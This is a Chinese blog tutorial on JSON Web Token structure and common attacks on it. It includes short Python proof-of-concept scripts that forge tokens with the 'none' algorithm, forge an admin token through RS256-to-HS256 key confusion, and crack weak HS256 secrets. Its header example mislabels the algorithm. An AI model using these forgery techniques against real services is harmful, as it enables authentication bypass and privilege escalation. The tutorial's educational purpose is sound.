JSON WEB TOKEN-----jwt

最新推荐文章于 2024-03-10 23:25:14 发布
最新推荐文章于 2024-03-10 23:25:14 发布
阅读量522 收藏
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44255856/article/details/90261888
版权

一,JWT介绍
在这里插入图片描述
JSON Web Token(JWT)是目前最流行的跨域身份验证解决方案。是一个开放标准(RFC 7519),它定义了一种紧凑的、自包含的方式,用于作为JSON对象在各方之间安全地传输信息。该信息可以被验证和信任,因为它是数字签名的。
二,JWT的原理
服务器认证后,生成一个JSON对象,发回给用户。就像下面一样。

{
	“姓名”:“FFM-G”,
	“时间”:“2019年5月”
}

三:JWT的数据结构

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiUG9vb28iLCJwcml2IjoiYWRtaW4ifQ.wBWpv0FNU_BIZqK0OdockoR2nzRRJT9gTWPXvMd497k

上面这个就是一个JWT。他是一个很长的字符串,一共分为三部分,每部分用(.)分割。

三部分依次如下:

  • header(头部)
  • payload(负载)
  • Signature(签名)
    也就是说Header.Payload.Signature
    jwt 解码https://jwt.io/
    第一部分,头部headereyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
{
  "alg": "RS256",
  "typ": "JWT"
}

alg表示签名的算法,默认为HS256,或者是RSA
typ表示token的类型。
对header部分进行base64url编码,编码后就是eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
第二部分:负载payloadeyJuYW1lIjoiUG9vb28iLCJwcml2IjoiYWRtaW4ifQ

{
  "name": "Poooo",
  "priv": "admin"
}

可见可以看到用户名和用户,因此不要在jwt中的header和payload中放置敏感的信息,除非他们本身是加密的。
对payload部分进行base64url编码,编码后就是payloadeyJuYW1lIjoiUG9vb28iLCJwcml2IjoiYWRtaW4ifQ
第三部分:签名signaturewBWpv0FNU_BIZqK0OdockoR2nzRRJT9gTWPXvMd497k
Signature 部分是 对前两部分 的 签名,目的是:防止数据篡改。
首先,需要指定一个密钥(secret)。这个密钥只有服务器才知道,不能泄露给用户。然后,使用 Header 里面指定的签名算法(默认是 HMAC SHA256),按照下面的公式产生签名。

HMACSHA256(
  base64UrlEncode(header) + "." +
  base64UrlEncode(payload),
  secret)

算出签名以后,把 Header、Payload、Signature 三个部分拼成一个字符串,每个部分之间用"点"(.)分隔,就可以返回给用户。
base64url:这个编码其实和base64大体上并没有多少变化,只是有时token会在url中传输,例如:www.xxxx.com?token=xxxx 因为base64中的+ = /会在url中有特殊的含义,所以要进行替换。=会被省略 +替换为 -/替换为 _。这就是base64url编码。

四:攻击jwt
1,敏感信息泄露
因为jwt是明文传输,所以payload容易存在敏感信息泄露。

2,修改算法为none
签名算法是为了后端进行签名校验,所以修改alg算法为none,后端就不会进行签名校验。直接可以将token中的signaturn数据(只留下header+’.’+payload+’.’)提交到服务器即可。
这种攻击的例子可以参考:http://demo.sjoerdlangkemper.nl/jwtdemo/hs256.php
案例如下:

import jwt
import base64

# 原header
# eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9
# {"typ":"JWT","alg":"HS256"}

# 原payload eyJpc3MiOiJodHRwOlwvXC9kZW1vLnNqb2VyZGxhbmdrZW1wZXIubmxcLyIsImlhdCI6MTUwNDAwNjQzNSwiZXhwIjoxNTA0MDA2NTU1LCJkYXRhIjp7ImhlbGxvIjoid29ybGQifX0
# {"iss":"http:\/\/demo.sjoerdlangkemper.nl\/","iat":1504006435,"exp":1504006555,"data":{"hello":"world"}}

def b64urlencode(data):
    return base64.b64encode(data).replace('+', '-').replace('/', '_').replace('=', '')

# 构造算法字段为none, payload部分可以随意修改
print b64urlencode("{\"typ\":\"JWT\",\"alg\":\"none\"}") + \
    '.' + b64urlencode("{\"data\":\"test\"}") + '.'

结果如下:
在这里插入图片描述

3,修改算法RS256为HS256
算法RS256是非对称算法,所以使用私钥对信息进行签名,使用公钥进行验证。
算法HS256是对称算法,只需要使用秘密密钥对每条信息进行签名和验证。
案例如下:
如果将算法从RS256更改为HS256,后端代码会使用公钥作为秘密密钥,然后使用HS256算法验证签名,从而伪造token通过验证。

import jwt
import base64
public = open('pubkey.txt', 'r').read() #pubkey.txt为公钥
print jwt.encode({"name": "Poooo","priv": "admin"}, key=public, algorithm='HS256')

4,HS256(对称加密)密钥破解
如果HS256密钥强度较弱,可以直接暴力破解,如PyJWT库样例代码中使用secret字符串当做密钥

那么暴力猜解密钥,当密钥正确则解密成功,密钥错误解密代码抛出异常

可使用PyJWT或 John Ripper进行破解测试
PyJWT库 https://github.com/jpadilla/pyjwt


>>> import jwt

>>> encoded = jwt.encode({'some': 'payload'}, 'secret', algorithm='HS256')

'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzb21lIjoicGF5bG9hZCJ9.4twFt5NiznN84AWoo1d7KO1T_yoc0Z6XOpOVswacPZg'

>>> jwt.decode(encoded, 'secret', algorithms=['HS256'])

{'some': 'payload'}

参考:https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/
https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/
https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html
http://www.cnblogs.com/dliv3/p/7450057.html

「已注销」
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
JWT(Java Web Token
从心初发
03-24 971
文章目录1. JWT 产生背景1.1 传统基于服务的认证方式1.2 基于Token的身份认证2. JWT 简介2.1 JWT 是什么2.2 JWT 结构说明2.2.1 Header2.2.2 Payload2.2.3 Signature3. JWT 是如何工作的?4. 我们为什么要使用JSON Web令牌?5. 为什么有人不推荐使用 JWT?5.1 为什么不推荐使用JWT?5.2 如何解决JWT...
使用EggJS开发接口(三)登录验证之egg-jwt 及 crypto加密
ximenxiafeng的专栏
12-24 7824
egg-jwt是一个生成token的插件 token的规则: 服务器返回的token数据基本结构是Header.Payload.Signature,header、payload、signature三部分以'.'隔开。 例如: 1 2 3 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9. eyJ1c2VyTmFtZSI6ImNlc2hpemhhbmdodTAyIiwiaWF0IjoxNTU1MjEyMzg1LCJle...
JWT原理详解
前端那些事@时光
09-27 3272
JWT原理详解 随着前后端分离的发展,以及数据中心的建立,越来越多的公司会创建一个中心服务器,服务于各种产品线。 而这些产品线上的产品,它们可能有着各种终端设备,包括但不仅限于浏览器、桌面应用、移动端应用、平板应用、甚至智能家居 实际上,不同的产品线通常有自己的服务器,产品内部的数据一般和自己的服务器交互。 但中心服务器仍然有必要存在,因为同一家公司的产品总是会存在共享的数据,比如用户数据 这些设备与中心服务器之间会进行http通信 一般来说,中心服务器至少承担着认证和授权的功能,例如登录:各种设备发
jwt攻击总结
Shanfenglan's blog
12-31 8836
文章目录1. 通过修改header中的alg字段实现攻击2. 通过爆破密钥3. 修改kid实现攻击4. 修改加密算法参考文章 jwt格式举例如下,以点来分割,总共为三部分: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIyMzMzIiwibmFtZSI6Im5wZnMiLCJhZG1pbiI6dHJ1ZX0.mcHAMzOrqyqLk5-tmWVp1-zdlqIVcOdv-39oQIoOWoQ jwt是一种类似于token、session的用户身份凭据。
openssl 计算sha256
lyyslsw的专栏
09-04 5868
echo -n eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJwYnh3ZWIiLCJleHAiOjE1OTg5NTc2NTEsImlhdCI6MTU5ODk1NzY0MSwiaXNzIjoicGJ4 | openssl sha -sha256 -binary -hmac key12345678 | base64
JWT-Json Web Token-目前最流行跨域身份验证解决方案
最新发布
04-25
JWT是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,...
JWT-JSON Web Token實作分享1
08-08
JSON Web TokenJWT)是一种基于 token 的身份验证机制,它可以提供一种无状态、可扩展、安全的身份验证方式。下面将详细介绍 JWT 的实现和使用。 为什么需要 Web Token? 在服务器端身份验证中,传统的基于...
jwt-token-verifier:验证JWT令牌OpenID提供程序
03-25
JWTJSON Web Token)是一种开放的标准(RFC 7519),定义了一种紧凑的、自包含的方式来安全地在各方之间传输信息作为一个 JSON 对象。这个信息可以被验证和信任,因为它是数字签名的。JWT 在身份验证和授权场景中...
REST2SQL11 基于jwt-go生成token与验证
03-08
在本主题中,我们将深入探讨如何使用`jwt-go`库在Go语言中生成和验证JSON Web Tokens(JWT),这是RESTful API设计中的一个重要组件。JWT是一种轻量级的身份验证机制,用于安全地传递信息,而无需在服务器之间共享...
NKJWT:Objective-C 的 Json Web Token
06-15
JWTJSON Web Token)是一项了不起的技术,它使网络/API 集成变得极其容易和快速。 这个库让你只需几行代码就可以获得 JWT 的所有好处。用户指南 安装添加到您的 Podfile: pod 'NKJWT' , '~> 0.1' 验证令牌 ...
Golang 实现JWT认证
热门推荐
neweastsun的专栏
05-04 1万+
Golang 实现JWT认证 认证是让应用知道给应用发送请求的人是他所说的那个人。JSON web token (JWT)是认证的一种方式,相比于基于Session认证,在系统中并不存储任何关于用户信息。 本文演示使用Golang实现基于JWT认证的示例应用。 1. JWT 1.1. JWT格式 假设用户user1尝试登录应用,成功后收到token信息如下: eyJhbGciOiJIUzI1NiI...
基于Token的身份验证的过程
喵酱
05-06 9304
基于Token的身份验证的过程如下:客户端使用用户名跟密码请求登录服务端收到请求,去验证用户名与密码验证成功后,服务端会签发一个 Token,再把这个 Token 发送给客户端客户端收到 Token 以后可以把它存储起来,比如放在 Cookie 里或者 Local Storage 里客户端每次向服务端请求资源的时候需要带着服务端签发的 Token服务端收到请求,然后去验证客户端请求里面带着的 To...
jwt 私钥_基于JWTtoken弱密钥爆破
weixin_39629679的博客
12-21 7380
JSON Web Token(JWT)是目前最流行的跨域身份验证解决方案。直接根据token取出保存的用户信息,以及对token可用性校验,大大简化单点登录。JWT=header+payload+signature(以.相隔)例:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE1NzYxMTk2NTYsInVzZXJuYW1lIjoiemRqIiwi...
shell-jwt
qq_21442867的博客
12-05 1707
jwt
生成JWT格式的token
zhangdonghang
01-22 2592
JWT简介 JWTjson web token缩写 它将用户信息加密到token里,服务器不保存任何用户信息 服务器通过使用保存的密钥验证token的正确性,只要正确即通过验证 于token的身份验证可以替代传统的cookie+session身份验证方法 JWT组成 header部分 { "alg": "HS256", "typ": "JWT" } //对应base64U...
JWT身份验证原理简单讲解与nodejs简单实现
AKGWSB 's blog
08-14 8367
目录前言JWT简单介绍node中使用JWT安装jsonwebtoken包签发token验证token 前言 上一篇【基于token的持久化登录讲解及其实现】讲到token的机制,以及token的2大特性,即:只有服务器能够签发token,服务器可以验证token是否由自己签发。 可是上一篇博客编写的时候,对token的理解还不够深入,上一篇博客的token是最最最基本的token验证,而现在互联网应用的登录验证普遍使用JWT,即 JSON WEB TOKEN 的规范化验证,所以今天来学习一蛤,并且学习如何在
NET中高级开发工程师面试题(二)
不求上进的码农的博客
04-08 2939
1、Redis 和 MemCache 的区别 性能: redis 只能使用单核,而 Memcache 可以使用多核,所以在比较上,平均每一个核上Redis在存储小数据时比Memcached性能更高。而在100k以上的数据中,Memcache性能要高于Redis,虽然Redis最近也在存储大数据的性能上进行优化,但是比起Memcache,还是稍有逊色。说了这么多,结论是,无论你使用哪一个,每秒处...
JWT令牌基本使用
2301_76929910的博客
03-10 698
JWT令牌的使用
php jwt解密token,php实现JWT(json web token)鉴权实例详解
weixin_36378232的博客
03-10 1640
{"alg": "HS256","typ": "JWT"}对应base64UrlEncode编码为:eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9说明:该字段为json格式。alg字段指定了生成signature的算法,默认值为 HS256,typ默认值为JWTpayload部分:{"sub": "1234567890","name": "John Doe","iat":...
怎么解析jwt-go的token
08-20
要解析jwt-go的token,可以按照以下步骤进行操作: 1. 首先,引入`jwt-go`包并导入所需的其他依赖项。可以使用以下代码来实现: ``` import ( "fmt" "github.com/dgrijalva/jwt-go" ) ``` 2. 然后,定义自定义声明结构体,该结构体包含要在token中解析的声明信息。例如,可以定义一个名为`MyCustomClaims`的结构体,如下所示: ``` type MyCustomClaims struct { Foo string `json:"foo"` jwt.StandardClaims } ``` `MyCustomClaims`结构体中的`Foo`字段表示在token中包含的自定义声明。 3. 接下来,使用`jwt.ParseWithClaims`函数解析token并将其与自定义声明结构体进行绑定。可以使用以下代码实现: ``` tokenString := "eyJhbGciOiJIUzI1NiIsInR5cCI6I***XVCJ9.eyJmb28iOiJiY***iLCJleHAiOjE1***AwLCJpc3MiOiJ0ZXN0In0.HE7fK0xOQwFEr4WDgRWj4teRPZ6i3GLwD5YCm6Pwu_c" claims := &MyCustomClaims{} token, err := jwt.ParseWithClaims(tokenString, claims, func(token *jwt.Token) (interface{}, error) { // 返回用于验证token的加密密钥 return []byte("AllYourBase"), nil }) ``` 在`jwt.ParseWithClaims`函数中,传入token字符串、自定义声明结构体的指针和一个回调函数。回调函数用于提供用于验证token的加密密钥。 4. 最后,检查解析和验证token的结果。可以使用以下代码来检查是否成功解析和验证了token: ``` if token.Valid { fmt.Printf("%v %v", claims.Foo, claims.ExpiresAt) } else { fmt.Println(err) } ``` 如果token有效,可以通过`claims`变量访问其中的声明信息。在上述示例中,我们打印了`Foo`字段和`ExpiresAt`声明的值。如果token无效,将打印出解析和验证错误。 综上所述,这就是解析`jwt-go`的token的步骤。请注意,需要根据自己的实际情况修改代码中的token字符串和自定义声明结构体。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [(4)go web开发之 JWT-Token认证机制Access Token与Refresh Tokenjwt-go 库介绍及在项目中使用](https://blog.csdn.net/pythonstrat/article/details/121875782)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值